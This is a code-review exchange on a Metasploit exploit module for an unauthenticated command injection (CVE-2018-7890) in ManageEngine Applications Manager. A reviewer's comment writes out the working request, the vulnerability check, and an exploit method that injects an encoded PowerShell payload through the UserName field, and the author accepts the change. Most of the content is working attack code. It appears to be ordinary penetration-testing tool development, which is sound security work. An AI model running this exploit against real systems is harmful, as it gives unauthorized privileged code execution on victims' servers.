modules/exploits/windows/http/manageengine_appmanager_exec.rb

```diff
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "ManageEngine Applications Manager Remote Code Execution",
+      'Description'    => %q(
+        This module exploits command injection vulnerability in the ManageEngine Application Manager product.
+        An unauthenticated user can execute a operating system command under the context of privileged user.
+
+        Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
+        by accessing given system. This endpoint calls a several internal classes and then executes powershell script
+        without validating user supplied parameter when the given system is OfficeSharePointServer.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-7890'],
+          ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 10,
+          'RPORT' => 9090
+        },
+      'Payload' =>
+        {
+          'BadChars' => "\x22"
+        },
+      'Platform'       => ['win'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        => [['Automatic', {}]],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Mar 7 2018',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
+      ]
+    )
+  end
+
+  def check
```

Comment:
Perhaps I missed something, but it looks like the HTTP request in the `check` method and `exploit` method are almost identical, with the exception of the `UserName`.

You could create a new method which takes a `username` parameter and returns the result of the `send_request_cgi` call, then call this method from both the `check` method and `exploit` method.

Not required, but it's nice to be DRY :)

Something like this:

```ruby
  def test_credential(username)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
      'vars_post' => {
        'method' => 'testCredentialForConfMonitors',
        'type' => 'OfficeSharePointServer',
        'montype' => 'OfficeSharePointServer',
        'isAgentEnabled' => 'NO',
        'isAgentAssociated' => 'false',
        'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
        'Version' => '2013',
        'Powershell' => 'True', # :-)
        'CredSSP' => 'False',
        'SPType' => 'SPServer',
        'CredentialDetails' => 'nocm',
        'Password' => Rex::Text.rand_text_alpha(rand(3..10)),
        'UserName' => username
      }
    )
  end

  def check
    res = test_credential(Rex::Text.rand_text_alpha(rand(3..10)))

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    if res.body.include?('Kindly check the credentials and try again')
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    powershell_options = {
      encode_final_payload: true,
      remove_comspec: true
    }
    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)

    print_status('Triggering the vulnerability')

    test_credential("$(#{p})")
  end

```

Reply:
Couldn't agree more. Done^^